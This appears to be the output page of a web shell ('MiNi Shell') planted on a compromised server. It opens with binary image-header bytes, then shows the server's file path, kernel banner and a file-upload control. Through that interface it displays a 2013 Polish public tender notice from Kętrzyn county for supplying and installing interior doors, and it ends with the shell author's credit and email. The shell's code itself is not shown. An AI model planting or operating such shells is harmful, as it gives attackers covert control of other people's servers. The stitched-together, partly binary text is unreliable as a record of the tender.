JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/57764-N-2013.html

<p class="kh_header"><b>Kętrzyn: Zakup i montaż stolarki drzwiowej wewnętrznej w ramach inwestycji: 
Zmiana sposobu użytkowania budynków szkolnych przy ulicy Pocztowej 9, 11, 13 w Kętrzynie na budynki administracyjne powiatowych jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 57764 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Kętrzynie , Plac Grunwaldzki 1, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7517500, 7511690, faks 089 7512401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> starostwo@starostwo.ketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i montaż stolarki drzwiowej wewnętrznej w ramach inwestycji: 
Zmiana sposobu użytkowania budynków szkolnych przy ulicy Pocztowej 9, 11, 13 w Kętrzynie na budynki administracyjne powiatowych jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:  Zakup i montaż stolarki drzwiowej wewnętrznej w ramach inwestycji:  Zmiana sposobu użytkowania budynków szkolnych przy ulicy Pocztowej 9, 11, 13 w Kętrzynie na budynki administracyjne powiatowych jednostek organizacyjnych.  
 2.1. Przedmiot zamówienia obejmuje: 
1) zabezpieczenie folią posadzki i ścian przed uszkodzeniami podczas montażu drzwi
2) przygotowanie ościeża do montażu drzwi tj. ewentualne drobne podkucia i korekty wymiaru otworu 
3) dostarczenie i montaż (zgodnie z technologią producenta) ościeżnicy regulowanej drzwi do pomieszczeń biurowych, gospodarczych  i  łazienek w otworach w ilościach i o parametrach jak w zestawieniu poniżej.
Uwaga: (ościeża w stanie surowym, ściany w stanie wykończonym tj. otynkowane, pomalowane) 
4)  dostarczenie montaż i regulacja skrzydła drzwiowego i samozamykacza (w przypadku drzwi p.pożarowych) w ilościach i o parametrach jak w zestawieniu poniżej.
5) Uzupełnienie tynku na ościeżu i pomalowanie go farba emulsyjną w przypadku ścian o grubości większej od maksymalnej szerokości ościeżnicy regulowanej 

WYKAZ STOLARKI DRZWIOWEJ WEWNĘTRZNEJ:

1. Drzwi drewniane wewnętrzne do biur, pomieszczeń gospodarczych i łazienek.

A) drzwi o  szerokość skrzydła (90) - szt. 130  w tym: L - szt. 69, P - szt.  61 .
B) drzwi (do  pom. Gospodarczych) o szerokość skrzydła (80) - szt. 12  w tym: L - szt. 7, P - szt.  5 .
C) drzwi do  łazienek: szerokość skrzydła (90) - szt. 30  w tym: L - szt. 9, P - szt.  21 .
D) drzwi dwuskrzydłowe o  szerokość skrzydła (90+90) - szt. 2  w tym: L - szt. 1, P - szt.  1.

	        2.  Drzwi stalowe wewnętrzne do pomieszczeń w piwnicach i archiwum.

A) drzwi o szerokość skrzydła (90)- szt. 11  w tym: L - szt. 9, P - szt. 2 .
B) drzwi o szerokość skrzydła (80)- szt. 11  w tym: L - szt. 6, P - szt.  5 .
C) drzwi p.pożarowe  i antywłamaniowe o szerokość skrzydła (90)- szt. 2  w tym: L - szt. 2, EI30.
D) drzwi p.pożarowe  i antywłamaniowe (80)- szt. 1.  (P).
E) drzwi dwuskrzydłowe (48+80)- szt. 1  (L).
F)  drzwi dwuskrzydłowe p.pożarowe  (48+80)- szt. 1  (P) EI30, wysokość: 250cm.
G)  drzwi dwuskrzydłowe p.pożarowe  i antywłamaniowe (58+90)- szt. 1  (P) EI30, 

SPECYFIKACJA TECHNICZNA DRZWI WEWNĘTRZNYCH.

1. Drzwi drewniane wewnętrzne do biur, pomieszczeń gospodarczych i łazienek.
1. Drzwi wewnętrzne drewniane okleinowane do  pomieszczeń biurowych, gospodarczych i łazienek (np. typu. Porta System Okleinowane  lub równoważne);
2. Konstrukcja skrzydła wykonana z drewna litego lub klejonego; ościeżnice dostosowane do grubości ścian z olistwowaniem obustronnym tzw. ościeżnica regulowana (patrz rysunek poniżej).
3. Wypełnienie skrzydła - wkład: płyta wiórowa otworowa.
4. Grubość skrzydła: 39÷45mm. Profil krawędzi skrzydła K . Oba boki skrzydła pokryte  taśmą brzegową ABS o grubości 1 mm w kolorze skrzydła,  przylgowe,
5. Pokrycie: okleina CPL o grubości 0,7 mm, kolor: orzech lub mahoń i kolory zbliżone 
6. Ościeżnica regulowana okleinowana w kolorze skrzydła.
7.  Izolacyjność akustyczna nie mniejsza niż 32dB.
8. Zamek dostosowany pod wkładkę patentową, klamka mosiężna lub z duraluminium,  szyld podłużny, wkładka patentowa z kluczami zapasowymi - 3 szt. (np. firmy Schaffner, Gerda lub równoważna), rozstaw 70 mm.
9. Drzwi wewnętrzne łazienkowe wyposażone we wkładkę patentową z kluczami zapasowymi - 3 szt. oraz wyposażone dodatkowo w tuleje lub kratki wentylacyjne. Drzwi łazienkowe wewnętrzne z szybą.
10. Skrzydła na trzech zawiasach.
11. Drzwi przeciwpożarowe muszą posiadać tabliczki znamionowe z oznaczeniem:
1) Nazwa i adres producenta,
2) Nazwa wyrobu,
3) Nazwa i symbol handlowy - dotyczy drzwi,
4) Klasa izolacyjności akustycznej (jeżeli ma zastosowanie) - dotyczy drzwi,
5) Klasa odporności ogniowej,
6) Klasa dymoszczelności (jeżeli ma zastosowanie),
7) Numer Aprobaty Technicznej,
8) Numer Krajowej Deklaracji Zgodności,
9) Rok produkcji,
10) Numer fabryczny.
12. Drzwi muszą posiadać aprobatę techniczną lub deklarację zgodności z odpowiednią dla produktu normą. 
13. Drzwi muszą posiadać Atest PZH.
             					 

Zakres robót montażowych związany z dostawą drzwi będący przedmiotem zamówienia:
a) zabezpieczenie folią posadzki i ścian przed uszkodzeniami podczas montażu drzwi
b) przygotowanie ościeża do montażu drzwi tj. ewentualne drobne podkucia i kolekty wymiaru otworu. 
Uwaga: Otwory są przygotowane w stanie surowym, na ścianach tynk obustronnie, w ościeżu brak tynku, wykonana posadzka z wykładziny PCV.
c) montaż ościeżnicy zgodnie z technologią producenta drzwi, montaż i regulacja skrzydła drzwiowego i samozamykacza (w przypadku drzwi p.pożarowych).

2. Drzwi stalowe wewnętrzne do pomieszczeń w piwnicach.
1.  Drzwi stalowe wewnętrzne, płaskie do  pomieszczeń gospodarczych w piwnicach malowane proszkowo lub laminowane. 
      Uwaga niektóre o nietypowej wysokości - niższe od standardowych.
2.  Konstrukcja: skrzydła i ościeżnice wykonana ze stali ocynkowanej.
3.  Wypełnienie skrzydła - wkład: spieniony polistyren (nie dotyczy drzwi p.poż).
4.  Grubość skrzydła: min 40mm. Uszczelka na całym obwodzie ościeżnicy.
5. Pokrycie (skrzydło i ościeżnica): laminat struktura drewna lub malowane proszkowo na kolor popielaty. 
6.  Ościeżnica stalowa z jednostronnym wyłożeniem na ścianę w kolorze skrzydła (patrz rysunek powyżej).           
7.  Izolacyjność akustyczna nie mniejsza niż 29dB.
8.  Zamek dostosowany pod wkładkę patentową, klamka mosiężna lub z duraluminium,  szyld podłużny, wkładka patentowa z kluczami zapasowymi - 3 szt. (np. firmy Schaffner, Gerda lub równoważna).
9. Wszystkie drzwi  do pomieszczeń piwnicznych wyposażone dodatkowo w tuleje lub kratki wentylacyjne. Drzwi do pomieszczeń archiwum-antywłamaniowe (3szt.).
10. Drzwi muszą posiadać aprobatę techniczną lub deklarację zgodności z odpowiednią dla produktu normą. 
11. Drzwi muszą posiadać Atest PZH.
Zakres robót montażowych związany z dostawą drzwi będący przedmiotem zamówienia:
a) przygotowanie ościeża do montażu drzwi tj. ewentualne drobne podkucia i kolekty wymiaru otworu. Uwaga: Otwory są przygotowane w stanie surowym, na ścianach tynk obustronnie, w ościeżu brak tynku, wykonana posadzka z wykładziny lub gresu.
b) montaż ościeżnicy regulowanej zgodnie z technologią producenta drzwi, montaż i regulacja skrzydła drzwiowego i samozamykacza (w przypadku drzwi p.pożarowych).
c) uzupełnienie tynku na szerokości ościeża po zamontowaniu ościeżnicy. Szpachlowanie i położenie powłoki malarskiej z farby emulsyjnej.

Uzupełnienie WYKAZU STOLARKI DRZWIOWEJ WEWNETRZNEJ zawiera ZESTAWIENIE SZCZEGÓŁOWE DRZWI  - załącznik nr  7  do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości - 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100). 
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - zał. nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym najmniej jedną robotą dotyczącą wymiany,  zakupu i montażu stolarki drzwiowej wewnętrznej, o minimalnej kwocie brutto 80.000,00 zł (osiemdziesiat tysięcy złotych); oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (referencje zamawiających, protokoły bezusterkowego odbioru końcowego)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - zał. nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać kwalifikacje/wykształcenie i doświadczenie osób przeznaczonych do wykonania zamówienia tj. podać zakres i wskazać gdzie i kiedy dokonali montażu stolarki otworowej, wskazać zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości nie niższej niż 100.000 zł (sto tysięcy złotych), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>karty katalogowe oferowanych drzwi wewnętrznych i ościeżnicy regulowanej, zawierające zdjęcia lub rysunki, dane techniczne, sposób montażu - umożliwiające Zamawiającemu ocenę zgodności oferowanego produktu z wymaganiami zawartymi w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warmia.mazury.pl/powiat_ketrzyński/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kętrzynie
Plac Grunwaldzki 1
11-400 Kętrzyn	
woj. warmińsko - mazurskie
pokój nr 33 (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 11:00, miejsce: Starostwo Powiatowe w Kętrzynie
Plac Grunwaldzki 1
11-400 Kętrzyn	
woj. warmińsko - mazurskie
pokój nr 52 (sekretariat-parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com